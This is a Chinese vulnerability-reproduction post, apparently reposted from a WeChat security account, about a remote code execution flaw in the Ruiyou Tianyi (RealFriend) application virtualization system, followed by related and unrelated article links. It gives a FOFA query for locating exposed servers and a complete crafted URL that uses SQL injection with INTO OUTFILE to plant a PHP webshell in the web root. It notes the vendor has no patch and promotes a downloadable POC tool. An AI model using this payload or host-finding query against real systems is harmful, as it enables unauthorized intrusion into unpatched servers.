文章目录

  • 瑞友天翼应用虚拟化系统存在远程代码执行漏洞
    • 1. 瑞友天翼应用虚拟化系统简介
    • 2.漏洞描述
    • 3.影响版本
    • 4.fofa 查询语句
    • 5.漏洞复现
    • 6.POC&EXP
    • 7.整改意见
    • 8.往期回顾

瑞友天翼应用虚拟化系统存在远程代码执行漏洞

1. 瑞友天翼应用虚拟化系统简介

微信公众号搜索:南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发

瑞友天翼应用虚拟化系统是具有自主知识产权,基于服务器计算(Server-based Computing)架构的应用虚拟化平台。

2.漏洞描述

瑞友天翼应用虚拟化系统存在远程代码执行漏洞,攻击者可以利用此漏洞获WEB主机权限。

3.影响版本

4.fofa 查询语句

title=“瑞友天翼-应用虚拟化系统”

5.漏洞复现

先把去以下网址把你的需要写入的php代码转换成16进制

例如<?php phpinfo();?> 转换成16进制是

<?php phpinfo();?> 转换成16进制 3c3f70687020706870696e666f28293b3f3e

我需要把这个文件保存在根目录的 testtest.php文件内。
拼接你的文件名和php代码16进制值,得到如下地址,然后访问。

拼接得到如下地址

http://127.0.0.1/AgentBoard.XGI?user=%27%7C%7C%271%27%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27C%3A%2FRealFriend%2FRap%20Server%2FWebRoot%2Ftesttest.php%27%20LINES%20TERMINATED%20BY%200x3c3f70687020706870696e666f28293b3f3e--%20-&cmd=UserLogin

访问以上链接后,webshell地址就保存在根目录下

http://127.0.0.1/testtest.php

6.POC&EXP

关注公众号 南风漏洞复现文库 并回复 漏洞复现20 即可获得该POC工具下载地址:

本次的poc加入了代理功能,方便各位师傅调试。

7.整改意见

厂商尚未提供漏洞修补方案,请关注厂商主页及时更新: http://www.realor.cn

8.往期回顾

瑞友天翼应用虚拟化系统存在远程代码执行漏洞相关推荐

  1. 瑞友天翼应用虚拟化系统RCE漏洞复现+利用

    1.产品简介 瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算架构的应用虚拟化平台.它将用户各种应用软件集中部署在瑞友天翼服务器(群)上,客户端通过WEB即可 ...

  2. Goby 漏洞更新 | 瑞友天翼应用虚拟化系统 index.php 文件远程代码执行漏洞

    漏洞名称: 瑞友天翼应用虚拟化系统 index.php 文件远程代码执行漏洞 English Name:Ruiyou Tianyi Application Virtualization System ...

  3. 如何外网登录访问瑞友天翼应用虚拟化系统?——快解析内网端口映射方案

    瑞友天翼应用虚拟化系统(GWT System)是国内具有自主知识产权的应用虚拟化平台,是基于服务器计算(Server-based Computing)的应用虚拟化平台.如何将内网平台提供到互联网上外网 ...

  4. 微软多个 Windows 系统存在远程代码执行漏洞(ICMP协议)(MPS-2023-1376)

    漏洞描述 Internet Control Message Protocol (ICMP) 协议是TCP/IP协议簇的一个子协议,用于在IP主机.路由器之间传递控制消息.raw socket 是一种网 ...

  5. [系统安全] 十.Windows漏洞利用之SMBv3服务远程代码执行漏洞(CVE-2020-0796)及防御详解

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  6. [系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  7. 泛微e-cology OA 系统远程代码执行漏洞

    声明 好好学习,天天向上 漏洞描述 2019年9月19日,泛微e-cology OA系统自带BeanShell组件被爆出存在远程代码执行漏洞.攻击者通过调用BeanShell组件中未授权访问的问题接口 ...

  8. 【漏洞预警】泛微e-cology OA系统远程代码执行漏洞及其复现

    目录 0x00前言 0x01漏洞描述 0x02漏洞复现 0x03漏洞POC 0x04影响范围 0x05漏洞防护 0x06免责声明 0x00前言 2019年9月19日,泛微e-cology OA系统自带 ...

  9. 用友NC BeanShell远程代码执行漏洞复现

    用友NC远程代码执行漏洞复现 漏洞介绍 用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一.该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接 ...

最新文章

  1. 机器学习与高维信息检索 - Note 5 - (深度)前馈神经网络((Deep) Feedforward Neural Networks)及基于CVXOPT的相关实例
  2. 使用php+swoole对client数据实时更新
  3. 小流域水土保持遥感信息系统
  4. C/C++ 框架,类库,资源集合
  5. 链表学习(一)静态链表的构造
  6. 入门顶点动画纹理的实例化绘制
  7. 【机器视觉】 case算子
  8. linux 启动流详解
  9. matlab时域转换成频域_从时域到频域,你只需要旋转一下!
  10. 内存中的栈空间与堆空间
  11. [LeetCode]Palindrome Number 推断二进制和十进制是否为回文
  12. iOS项目内购(IAP)纯代码
  13. 计算机软件著作权的软件全称,软件著作权名称要求是什么
  14. 根据经纬度获取位置信息
  15. 【一起学Rust | 设计模式】新类型模式
  16. Skin Pack Auto UXThemePatcher-Win8 UXTheme桌面主题破解补丁
  17. python二级题库(百分之九十原题) 刷题软件推荐 第六套
  18. html凹凸感设置,想让VRAY渲染的图有点凹凸效果怎么做?
  19. 解决video标签无法播放avi格式的视频
  20. 如何学习手绘插画?这五点很重要!

热门文章

  1. 光子神经网络的应用及发展概述
  2. .word 汇编指令
  3. Word2003ToHtml——Your file appears not to be a valid OLE2 document
  4. GD32驱动DS3231显示时钟踩坑记录
  5. redis重启后mysql丢失_Windows系统Redis重启后数据丢失的处理办法(待测)
  6. 常用留学查校渠道汇总
  7. 单行文本省略和多行文本省略
  8. 一个优秀技术经理必备的30条“软实力”,你有吗?
  9. 梅赛德斯-奔驰在上海车展发布EQG概念车
  10. 中国商业贝恩玛丽酒店行业市场供需与战略研究报告